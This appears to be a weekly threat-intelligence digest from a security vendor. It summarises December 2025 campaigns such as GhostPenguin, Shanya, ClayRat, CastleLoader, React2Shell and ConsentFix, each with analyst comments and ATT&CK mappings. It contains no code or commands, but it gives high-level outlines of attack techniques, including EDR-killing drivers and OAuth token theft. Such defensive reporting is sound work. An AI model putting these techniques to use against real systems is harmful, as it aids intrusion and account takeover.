Anomali Cyber Watch: GhostPenguin, SharePoint Exploits, Android Spyware, CastleLoader Malware Expansion, and more
GhostPenguin: Undetected Linux Backdoor Emerges from AI-Driven Threat Hunting
(published: December 8, 2025)
Researchers have uncovered a previously unknown Linux backdoor dubbed GhostPenguin, detected via their AI-powered threat hunting pipeline after it eluded traditional detection for over four months. GhostPenguin is a modular, multithreaded implant written in C++, offering remote shell access and full file system manipulation. Communication with its command-and-control server uses a custom RC5-encrypted UDP protocol, likely crafted to bypass conventional network and antivirus defenses. Upon execution, the malware performs a singleton check to avoid duplicate runs, obtains a session ID via handshake, then uses that ID to encrypt subsequent traffic, ensuring stealth and persistence.
Analyst Comment: GhostPenguin’s real significance lies in how it stayed hidden. Its custom RC5-encrypted UDP protocol and clean C++ architecture meant there were no familiar signatures, no predictable payload patterns, and no obvious network markers for traditional tools to catch. This is the kind of threat that slips quietly through any environment that assumes normal Linux processes are inherently trustworthy. Defenders should take this as a cue to widen their lens. Outbound UDP behaviour that looks slightly out of place, binaries that perform network operations with no clear purpose, and processes that maintain long-lived but low-volume connections are exactly where implants like GhostPenguin breathe.
MITRE ATT&CK: T1059.004 - Command and Scripting Interpreter: Unix Shell | T1021 - Remote Services | T1219 - Remote Access Software
Trust-Themed Phishing Surge Exploits SharePoint and e-Signature Workflows
(published: December 9, 2025)
Researchers recently uncovered a mass phishing campaign that sent over 40,000 malicious emails to roughly 6,100 organisations over a two-week span. The emails impersonated trusted file-sharing and electronic signature platforms (e.g. SharePoint and generic “eSign” services), using spoofed display names and official-looking logos to appear legitimate. All phishing links were wrapped through a trusted redirect service (via Mimecast Protect), which helped bypass automated security filters and lower end-user suspicion. Once clicked, users were directed to fraudulent sites designed to harvest credentials or sensitive financial data, often under the guise of document review or contract approval. The campaign targeted a wide swath of sectors, consulting, real estate, manufacturing, finance, healthcare, and more, largely in the United States, Europe, Canada, Asia, Australia, and the Middle East.
Analyst Comment: The most important insight from this campaign is how effectively the attackers weaponised a legitimate redirect service to manufacture trust. By funnelling every malicious link through Mimecast Protect, they bypassed both user suspicion and automated filtering, since the initial URL appeared clean and familiar. That single tactic gave their spoofed SharePoint and e-signing messages an air of authenticity that is hard to counter with traditional controls.
MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1204.002 - User Execution: Malicious File | T1553.002 - Subvert Trust Controls: Code Signing | T1056.003 - Input Capture: Web Portal Capture
Target Industry: Commercial , Manufacturing , Financial services , Healthcare
Target Region: Americas
Target Country: United states
Shanya Packer-as-a-Service Enables Evasive Ransomware Delivery
(published: December 9, 2025)
Security researchers have identified a new "packer-as-a-service" (PaaS) tool called Shanya that is rapidly becoming a key enabler for ransomware gangs. According to vendor research, Shanya wraps existing ransomware or malware payloads in a highly obfuscated loader that uses DLL side-loading, memory manipulation techniques, custom encryption per customer, anti-analysis checks (e.g., anti-VM, sandbox resistance), and AMSI bypasses. Once inside a target environment, it drops both a legitimate but vulnerable driver (ThrottleStop.sys) and a malicious unsigned driver (hlpdrv.sys) to gain kernel-level write access. This enables the tool to terminate or disable endpoint detection and response (EDR) products, paving the way for ransomware execution, effectively acting as an "EDR killer." Multiple ransomware groups, including Akira, Medusa and Qilin have been observed using Shanya across global campaigns in 2025.
Analyst Comment: What makes Shanya especially concerning is how neatly it plugs into the wider ecosystem of malicious as-a-service offerings that now function like a build-your-own-attack marketplace. Threat actors can pair Shanya with rented loaders, stealers, access brokers, bulletproof hosting, and proxy networks to create tailored, highly evasive intrusion chains without needing deep technical skill. Shanya becomes the attachment that neutralises EDR so everything else in the loadout can operate without resistance. This modularity means defenders are no longer dealing with single malware families but with custom-built stacks assembled from interchangeable services. The practical takeaway is that detection must focus on the early signals that indicate assembly of these components, especially suspicious driver activity, kernel-level manipulation, and pre-ransom execution patterns. The service-driven nature of Shanya ensures these evasion capabilities will spread quickly, so defending against the entire ecosystem rather than individual tools is now essential.
MITRE ATT&CK: T1574.002 - Hijack Execution Flow: Dll Side-Loading | T1027 - Obfuscated Files Or Information | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1562.001 - Impair Defenses: Disable Or Modify Tools | T1562.006 - Impair Defenses: Indicator Blocking | T1055 - Process Injection | T1068 - Exploitation For Privilege Escalation | T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control | T1112 - Modify Registry | T1222.001 - File and Directory Permissions Modification: Windows File And Directory Permissions Modification | T1204.002 - User Execution: Malicious File | T1059 - Command And Scripting Interpreter | T1547 - Boot Or Logon Autostart Execution | T1486 - Data Encrypted For Impact
ClayRat Upgrades Android Spyware to Expand Global Surveillance Capability
(published: December 8, 2025)
Researchers have identified a new variant of the ClayRat Android spyware that introduces stronger evasion, broader data theft and wider targeting across Russia and neighboring regions. The updated version disguises itself as legitimate messaging apps, video platforms, or regional services, exploiting Default SMS privileges and Accessibility Services to deploy keyloggers that capture PINs and passwords, enable full screen recording through the MediaProjection API, and automatically unlock devices using stolen credentials. The malware exfiltrates contacts, messages, call logs, location data and device identifiers while automatically disabling Google Play Protect to prevent removal. More than 700 unique APKs have been detected, distributed through Telegram channels, phishing sites and cloud platforms like Dropbox, primarily targeting Russian-speaking users. The campaign maintains infrastructure overlap with earlier ClayRat activity first observed in October 2025.
Analyst Comment: ClayRat's evolution demonstrates a shift toward sophisticated mobile espionage that achieves full device takeover through Accessibility Service abuse. The operators have built a surveillance platform that prevents victims from shutting down devices or removing the malware while continuously harvesting credentials and screen content. For defenders, mobile ecosystems require the same scrutiny as desktops. Implement device-level mobile threat detection, restrict Accessibility Service permissions, monitor for SMS handler abuse, and flag abnormal outbound traffic including WebSocket connections. Organizations using BYOD models face elevated risk from MFA interception and credential theft. Security teams must treat mobile telemetry and app provenance as critical signals to detect threats designed to blend into daily use.
MITRE ATT&CK: T1660 - Phishing | T1624.001 - Event Triggered Execution: Broadcast Receivers | T1655.001 - Masquerading: Match Legitimate Name or Location | T1516 - Input Injection | T1406.002 - Obfuscated Files or Information: Software Packing | T1517 - Access Notifications | T1417.001 - Input Capture: Keylogging | T1417.002 - Input Capture: Gui Input Capture | T1418 - Application Discovery | T1426 - System Information Discovery | T1513 - Screen Capture | T1512 - Capture Camera | T1616 - Call Control | T1636.002 - Protected User Data: Call Log | T1636.004 - Protected User Data: Sms Messages | T1481.002 - Web Service: Bidirectional Communication | T1646 - Exfiltration Over C2 Channel | T1582 - Sms Control
Target Region: Eastern-europe
Target Country: Russian federation
CastleLoader Malware Expands Capabilities Through New Social Engineering Delivery
(published: December 10, 2025)
CastleLoader infections are increasing across recent campaigns where operators now rely on the ClickFix lure to initiate execution. Once the user supplied command runs, the malware begins a multi stage fileless sequence that fetches an encrypted payload, uses Python based components to decode and launch shellcode in memory, and then retrieves a final module from attacker servers. CastleLoader is engineered as a flexible loader that supports interchangeable plug ins, enabling delivery of information stealers, remote access tools, and other commodity malware. Previous activity linked to the same family includes distribution of Lumma Stealer through fake repositories and traffic manipulation funnels. The updated campaigns indicate continued investment in modular staging and memory only execution which reduces forensic visibility and weakens signature based detection.
Analyst Comment: ClickFix’s rise matters because it removes much of the friction that typically limits social engineering campaigns. It turns a simple prompt into reliable execution, and that predictability gives operators the confidence to pair it with more advanced tooling. CastleLoader is a prime example. The loader is no longer just a staging mechanism but a way for attackers to future proof their operations. Its in memory design and modular plug ins mean the payload almost becomes irrelevant. What truly matters is the framework that can adapt faster than defenders can write signatures. The strategic insight is that campaigns like this shift the balance of power toward loaders that behave like platforms. Defenders should pivot accordingly, concentrating detection around the early behavioral seams that ClickFix and CastleLoader cannot fully hide such as unexpected command invocation, Python based subprocess chains, and brief encrypted retrievals.
MITRE ATT&CK: T1204.002 - User Execution: Malicious File | T1059 - Command And Scripting Interpreter | T1059.006 - Command and Scripting Interpreter: Python | T1620 - Reflective Code Loading | T1027 - Obfuscated Files Or Information | T1055 - Process Injection | T1027.005 - Obfuscated Files or Information: Indicator Removal From Tools | T1655 - Masquerading | T1105 - Ingress Tool Transfer
React2Shell Exploitation Delivers New Malware Across Multiple Sectors
(published: December 10, 2025)
Active exploitation of a critical remote code execution flaw in React Server Components, tracked as CVE-2025-55182 and dubbed React2Shell, is resulting in widespread malicious activity. Threat actors are leveraging this unauthenticated RCE vulnerability to deploy cryptocurrency miners, Linux backdoors, reverse proxy tools, and advanced post-exploit implants. Analysis from Huntress and multiple intel sources indicates automated tooling scanning for vulnerable React and Next.js instances and delivering payloads such as PeerBlight, CowTunnel, ZinFoq, and Kaiji variants across diverse industry sectors. The flaw impacts React 19.x Server Components and associated frameworks like Next.js, with public proofs of concept and active attacks emerging within hours of disclosure. Security authorities including CISA have added React2Shell to the Known Exploited Vulnerabilities catalog, and defenders report opportunistic exploitation by state-linked groups and malware campaigns. Immediate patching to updated package versions is strongly recommended to mitigate ongoing risk.
Analyst Comment: The notable shift here is the growing sophistication of what React2Shell is delivering. Early activity centered on miners and basic scripts, but the latest reporting shows actors now pushing structured tooling like PeerBlight and CowTunnel that provides durable access, proxy capabilities, and staged execution. This turns React2Shell from a quick exploitation vector into a pathway for full post-compromise operations. Defenders should not only patch but also hunt for evidence of these payloads on any system that was exposed before updates. The real risk now lies in silently deployed implants rather than the vulnerability itself.
MITRE ATT&CK: T1190 - Exploit Public-Facing Application | T1059 - Command And Scripting Interpreter | T1505.003 - Server Software Component: Web Shell | T1027 - Obfuscated Files Or Information | T1102 - Web Service | T1572 - Protocol Tunneling | T1106 - Native Api | T1496 - Resource Hijacking
NANOREMOTE Windows Backdoor Abuses Google Drive API for Stealthy C2
(published: December 11, 2025)
Researchers have detailed a new Windows backdoor called NANOREMOTE that uses the Google Drive API as its command and control channel. The malware is built in C++ and supports system reconnaissance, command execution, and reliable file transfers that mirror legitimate Drive functionality. Researchers linked NANOREMOTE with a cluster they track as REF7707, noting shared code patterns, identical command handlers, matching AES cryptographic implementations, and hard-coded paths also found in the group's earlier FINALDRAFT implant. Delivery is performed by WMLOADER, a component that imitates a Bitdefender file and fetches the main payload. NANOREMOTE communicates over HTTP for its main C2 server while leveraging HTTPS for Google Drive API operations, using encrypted and compressed JSON objects, enabling it to blend into normal cloud traffic. Its modular command structure and cloud API integration indicate a focused effort to create persistent, low-visibility access to targeted systems.
Analyst Comment: NANOREMOTE stands out because it shows how refined cloud-based C2 has become for groups like REF7707. By nesting its operations inside Google Drive API calls, the malware forces defenders to rethink what suspicious traffic looks like. The real concern is not only the backdoor but the tactic behind it, where trusted cloud services become covert transport layers for long-term access. The reuse of handlers, cryptography, and design patterns across FINALDRAFT and NANOREMOTE points to a structured toolkit rather than isolated tooling, suggesting continued investment in this approach. Monitoring these subtle patterns is where this implant becomes visible, and where defenders can get ahead of similar cloud-embedded threats.
MITRE ATT&CK: T1204.002 - User Execution: Malicious File | T1059 - Command And Scripting Interpreter | T1071.001 - Application Layer Protocol: Web Protocols | T1071.004 - Application Layer Protocol: Dns | T1105 - Ingress Tool Transfer | T1090.003 - Proxy: Multi-Hop Proxy | T1036 - Masquerading | T1027 - Obfuscated Files Or Information | T1082 - System Information Discovery
New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI
(published: December 11, 2025)
A newly observed threat called ConsentFix combines social engineering with OAuth abuse to compromise Microsoft accounts. In this attack, adversaries lure victims to compromised high-ranking search result sites that host fake CAPTCHA and “Sign In” prompts. When the victim follows these prompts, they are guided into a legitimate Azure CLI OAuth authorization flow. Upon successful sign-in (or if already authenticated), an OAuth authorization code is generated in the browser’s redirect URL. The victim is then instructed to paste that URL back into the malicious page. By capturing and exchanging this code, attackers obtain Azure CLI access tokens, granting full account access without needing the user’s password or MFA. Because the attack leverages a first-party Microsoft application (Azure CLI), many tenant-level consent restrictions do not block it.
Analyst Comment: ConsentFix marks a shift in identity compromise techniques by building on the familiar ClickFix interaction pattern and moving it from malware delivery to token theft. It shows that attackers no longer need passwords or MFA challenges to take over Microsoft accounts. The threat hinges on abusing a legitimate Azure CLI OAuth flow, which means traditional credential-centric defenses provide little value here. What matters is whether a user can be manipulated into completing an authentication step and handing over the resulting redirect URL. For defenders, the immediate priority is to treat Azure CLI activity as a monitored surface, especially in environments where its use is uncommon. Alerting on unexpected OAuth code-to-token exchanges, tightening consent policies around the Azure CLI application, and educating users that no legitimate Microsoft workflow requires pasting redirect URLs are actionable steps that materially reduce exposure.
MITRE ATT&CK: T1566.002 - Phishing: Spearphishing Link | T1528 - Steal Application Access Token | T1550.001 - Use Alternate Authentication Material: Application Access Token | T1098 - Account Manipulation
Supply Chain Attacks on GitHub Actions Surge in 2025
(published: December 12, 2025)
Security researchers have documented a sustained increase in supply chain attacks targeting GitHub Actions, the CI/CD automation platform embedded across modern software development workflows. Reporting from Black Hat Europe 2025 highlights how attackers are exploiting trust assumptions and misconfigurations in third-party Actions to access secrets and tamper with build pipelines. A notable example is the compromise of the widely used tj-actions/changed-files Action (CVE-2025-30066), which exposed credentials such as AWS keys and GitHub tokens across thousands of repositories. Advisories from CISA and other security bodies stress that while GitHub provides the platform, organizations retain responsibility for how Actions are selected, configured, and trusted. The incidents illustrate how developer convenience, when left unchecked, can translate into systemic supply chain risk at scale.
Analyst Comment: This activity is less about a new weakness and more about an old assumption being stressed at scale. GitHub is effectively shared infrastructure for the software industry, which makes it a predictable and efficient target for adversaries. When a popular Action is compromised, trust propagates faster than detection. The key intelligence insight is responsibility: supply chain security cannot be outsourced to the platform alone. Organizations decide which Actions they run, how they are pinned, and what permissions they receive. Defenders should treat GitHub Actions as first-class production assets, enforcing strict version pinning, least-privilege tokens, and routine workflow audits to limit blast radius when upstream trust fails.
MITRE ATT&CK: T1195 - Supply Chain Compromise | T1195.001 - Supply Chain Compromise: Compromise Software Dependencies And Development Tools | T1140 - Deobfuscate/Decode Files Or Information | T1114 - Email Collection
Apple Patches Two Actively Exploited WebKit Zero-Days
(published: December 13, 2025)
Apple released urgent security updates on December 13 for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and Safari to address two zero-day WebKit vulnerabilities that have been exploited in the wild against targeted users. The flaws, CVE-2025-43529 (use-after-free leading to arbitrary code execution) and CVE-2025-14174 (memory corruption), were actively abused in sophisticated attacks, and one of them had already prompted a Google Chrome patch days earlier. These flaws affect WebKit, the core browser engine used not only by Safari but also by third-party browsers on Apple platforms, broadening the potential impact surface. Apple’s security release is part of a series of patches this year that have addressed at least nine exploited zero-days. Users and administrators are strongly advised to update devices immediately to mitigate ongoing threats.
Analyst Comment: This activity fits a broader shift defenders should not ignore. As Apple platforms continue to grow in enterprise and executive use, they are drawing sustained attention from capable threat actors who favor high-impact, low-noise entry points like browser engines. WebKit’s shared role across iOS, macOS, and all mobile browsers amplifies the payoff of a single exploit, which helps explain the rising number of Apple zero-days seen in active attacks this year. Windows still dominates overall malware volume, but Apple is increasingly targeted where precision matters. For defenders, this reinforces two priorities: treat Apple patching with the same urgency as Windows, and monitor browser-driven activity as a primary initial access vector, not a secondary concern.
MITRE ATT&CK: T1189 - Drive-By Compromise | T1203 - Exploitation For Client Execution
Discover More About Anomali
Get the latest news about cybersecurity, threat intelligence, and Anomali's Security and IT Operations platform.
Propel your mission with amplified visibility, analytics, and AI.
Learn how Anomali can help you cost-effectively improve your security posture.
